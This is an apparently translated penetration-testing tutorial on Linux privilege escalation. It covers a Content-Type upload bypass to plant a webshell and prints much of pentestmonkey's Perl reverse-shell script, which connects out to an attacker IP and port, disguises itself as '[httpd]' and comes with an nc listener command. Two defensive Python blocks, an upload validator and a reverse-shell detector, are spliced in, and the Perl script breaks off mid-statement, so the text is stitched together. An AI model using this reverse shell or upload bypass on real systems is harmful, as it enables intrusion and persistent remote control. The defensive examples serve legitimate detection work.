103. Network Security Penetration Testing - [Privilege Escalation Part 1] - [Linux Kernel Vulnerability Privilege Escalation]

This article walks through privilege escalation using the Linux kernel vulnerability CVE-2015-1328. First, a webshell is obtained by bypassing the MIME-type restriction on file upload; next, an interactive shell is created; then a privilege-escalation exploit for the 3.19.0-15 kernel is located and used, and finally privileges are raised to root. The whole process covers environment setup, shell interaction, and vulnerability search and exploitation.

I believe that anyone who studies or works in security carries, to some degree, a sense of passion and mission!!!

I. Linux Kernel Vulnerability Privilege Escalation

1. Vulnerability background:

Usually, when we hold a webshell, the privileges we have are those of the web container: under IIS that is the IIS user group, under Apache it is the apache user. These are low-privileged accounts that can still run ordinary commands such as viewing the current user, network information, IP addresses and so on. To move on to internal network penetration, the privileges must be escalated to the highest level, i.e. system privileges or super-administrator privileges.

2. Exploitation:

(1) Lab environment
1. Target machine:
(1) Ubuntu 15.5.04 virtual machine [www.moontester.com]
(2) Scripting language environments: perl, python and php are all present
(3) Kernel version: 3.19.0-15-generic

2. Attacking host:
(1) Windows 7 virtual machine [192.168.97.130]
(2) Firefox + Burp Suite + AntSword + nc (the netcat "Swiss army knife")

3. Network environment:
(1) NAT network built with VMware
(2) Target link
URL: http://www.moontester.com/upload.php
(3) Bypass the MIME-type restriction on file upload to obtain a webshell

Step 1: obtain a webshell on the target through the file upload vulnerability

As shown in the figures below, visit the file upload page http://www.moontester.com/upload.php, then intercept the request in Burp Suite and modify the Content-Type of the file to bypass the upload restriction and upload a one-line webshell:
[images omitted]
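The bypass above works only because upload.php decides what a file is from the Content-Type header the client sends, and Burp Suite lets the client say anything. The following is an added example, not the page's upload.php and not code from the original post: a server-side validator, written in Python rather than PHP so that it runs stand-alone, that never consults the client header. It allowlists the final extension, checks the file's leading magic bytes against that extension, rejects image polyglots that carry script tags, and assigns a random server-chosen name. The allowlist, the script-marker list and the sample inputs are constructed.

```python
import os
import uuid
from typing import Dict

# Constructed allowlist: final extension -> (magic bytes the file must start with,
# content type the server will serve it as). The client's Content-Type plays no part.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
}
# Hypothetical marker list for polyglot images; illustrative, not exhaustive.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename: str, data: bytes, client_content_type: str,
                    max_bytes: int = 2_000_000) -> Dict:
    """Decide whether an upload is stored, based on its bytes and extension only."""
    def reject(reason: str) -> Dict:
        return {"accepted": False, "reason": reason}

    if not data or len(data) > max_bytes:
        return reject("empty or oversized file")

    # Only the final extension counts and it must be on the allowlist, so
    # "shell.php" is refused before its contents are even looked at.
    base = os.path.basename(filename)
    ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if ext not in ALLOWED_TYPES:
        return reject(f"extension {ext!r} not allowed")

    # The bytes must match the extension. Editing Content-Type in Burp Suite
    # cannot influence this check because the header is never read.
    magic, server_type = ALLOWED_TYPES[ext]
    if not data.startswith(magic):
        return reject("file content does not match its extension")

    # A genuine image header followed by script content is still refused.
    if any(marker in data for marker in SCRIPT_MARKERS):
        return reject("embedded script content")

    # The client's header is recorded for logging only; it decides nothing.
    mismatch = client_content_type.strip().lower() != server_type

    # Random server-chosen name: the uploader controls neither the path nor the extension.
    stored_name = f"{uuid.uuid4().hex}.{ext}"
    return {"accepted": True, "reason": "", "stored_name": stored_name,
            "content_type": server_type, "client_type_mismatch": mismatch}


def demo() -> Dict:
    """Constructed replay of the bypass: a PHP file uploaded with a spoofed image Content-Type."""
    return validate_upload("shell.php", b"<?php echo 'constructed test payload'; ?>", "image/png")


if __name__ == "__main__":
    print(demo())
```

Storing the accepted file under the random name outside the web root, and re-encoding images with an image library before serving them, are the remaining steps a production handler would add; the validator above only shows the decision that should never depend on the client header.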

Step 2: connect to the webshell with AntSword

As shown below, open AntSword and connect to the webshell that was just uploaded to the target:
[image omitted]

(4) Create an interactive shell

Step 1: a prerequisite for Linux privilege escalation is an interactive shell. The tool perl-reverse-shell.pl can be used to establish a socket. So how is the socket established? (The word "socket" means an interface or plug; here it is taken, by extension, to mean a TCP connection tunnel.)

The perl-reverse-shell.pl script is shown below; it contains comments explaining how the socket is set up.

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
# "reverse" refers to the direction of the connection. The convention here is:
# the attacker connecting to the target is "forward"; the target sending a connection request to the attacker is "reverse".
my $ip = '192.168.97.130';	# send the connection request to the attacker's IP
my $port = 12345;			# to this port on the attacker's IP
# The attacker must start listening on port 12345 beforehand, using the netcat command: nc -lvvp 12345

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any 
		# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicuous
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

	if ($auth) {
		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
			cgiprint("ERROR: Your client isn't authorised to view this page");
			cgiexit();
		}
	}
} elsif ($auth) {
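The script above leaves three traces a defender can key on: it renames itself to "[httpd]" to look like a kernel thread, it runs as the web server's user under a web server parent, and it holds an outbound TCP connection to the listener (192.168.97.130:12345 on this page). The Python below is an added example, not part of the original post or of pentestmonkey's tool. It runs those three heuristic checks over a process and socket snapshot whose fields are modelled on /proc/<pid>/cmdline, /proc/<pid>/exe and ss output; the Proc and Conn records, the sample snapshot, and the sets of web users, web server binaries and interpreters are all constructed assumptions to be tuned per host.

```python
import os
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    cmdline: str     # /proc/<pid>/cmdline as the process presents it; $0 = "[httpd]" rewrites this
    exe: str         # readlink /proc/<pid>/exe, resolved by the kernel; empty for real kernel threads
    parent_exe: str  # exe of the parent process


@dataclass
class Conn:
    pid: int
    lport: int
    raddr: str       # "ip:port" of the remote peer
    state: str


# Assumed per-host baselines (constructed); adjust for the deployment.
WEB_USERS = {"www-data", "apache", "http", "nobody"}
WEB_SERVER_BINARIES = {"apache2", "httpd", "nginx", "php-fpm"}
INTERPRETERS = {"sh", "bash", "dash", "perl", "python", "python3", "php", "nc", "ncat"}
EPHEMERAL_START = 32768  # Linux default ip_local_port_range low end; a local port this high suggests an outbound connection


def reverse_shell_indicators(procs: List[Proc], conns: List[Conn]) -> List[Dict]:
    """Return one finding per process that matches at least one reverse-shell heuristic."""
    conns_by_pid: Dict[int, List[Conn]] = {}
    for c in conns:
        conns_by_pid.setdefault(c.pid, []).append(c)

    findings = []
    for p in procs:
        prog = os.path.basename(p.exe)
        parent = os.path.basename(p.parent_exe)
        reasons = []

        # 1. Kernel-thread disguise: genuine kernel threads ("[kworker/0:1]") have no exe at all,
        #    so a bracketed name backed by a user-space binary is a process hiding its identity.
        if p.cmdline.startswith("[") and p.cmdline.endswith("]") and p.exe:
            reasons.append(f"kernel-thread-style name {p.cmdline!r} backed by {p.exe}")

        # 2. A web server worker spawning a shell or interpreter: command execution through a webshell.
        if parent in WEB_SERVER_BINARIES and prog in INTERPRETERS:
            reasons.append(f"{prog} spawned by web server process {parent}")

        # 3. Interpreter running as the web user with an established outbound connection: the reverse shell itself.
        outbound = [c for c in conns_by_pid.get(p.pid, [])
                    if c.state == "ESTABLISHED" and c.lport >= EPHEMERAL_START]
        if p.user in WEB_USERS and prog in INTERPRETERS and outbound:
            reasons.append("outbound connection to " + ", ".join(c.raddr for c in outbound))

        if reasons:
            findings.append({"pid": p.pid, "user": p.user, "exe": p.exe, "reasons": reasons})
    return findings


def sample_snapshot() -> Tuple[List[Proc], List[Conn]]:
    """Constructed snapshot: init, a kernel thread, sshd, a normal web worker, and the reverse shell."""
    procs = [
        Proc(1, 0, "root", "/sbin/init", "/sbin/init", ""),
        Proc(42, 2, "root", "[kworker/0:1]", "", ""),                                   # genuine kernel thread: no exe
        Proc(900, 1, "root", "/usr/sbin/sshd -D", "/usr/sbin/sshd", "/sbin/init"),
        Proc(1201, 1, "www-data", "/usr/sbin/apache2 -k start", "/usr/sbin/apache2", "/sbin/init"),
        Proc(1337, 1201, "www-data", "[httpd]", "/usr/bin/perl", "/usr/sbin/apache2"),  # perl-reverse-shell.pl
    ]
    conns = [
        Conn(900, 22, "192.168.97.130:51002", "ESTABLISHED"),      # inbound SSH session: local port is 22
        Conn(1201, 80, "192.168.97.130:50344", "ESTABLISHED"),     # the web request that launched the script
        Conn(1337, 41234, "192.168.97.130:12345", "ESTABLISHED"),  # outbound to the nc listener from the page
    ]
    return procs, conns


def demo() -> List[Dict]:
    procs, conns = sample_snapshot()
    return reverse_shell_indicators(procs, conns)


if __name__ == "__main__":
    for f in demo():
        print(f["pid"], f["user"], f["exe"])
        for r in f["reasons"]:
            print("   -", r)
```

The checks rely on /proc/<pid>/exe rather than the process name because the kernel resolves that link itself; assigning to $0 (and, on newer perls, the prctl name that goes with it) changes what ps shows but not which binary is running. On a live host the same logic applies to records built from /proc and from ss -tnp.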